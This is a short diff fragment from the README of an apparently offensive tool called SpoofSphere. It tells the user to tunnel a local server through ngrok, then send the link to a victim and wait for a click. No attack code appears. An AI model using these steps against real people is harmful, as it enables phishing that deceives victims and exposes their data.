Error2k25/SpoofSphere/README.md

 Take a new Terminal && run this command: <br>
 ngrok http 3000

 That's it.
-Now wait for click of the victim.
+Now send the link and wait for click of the victim.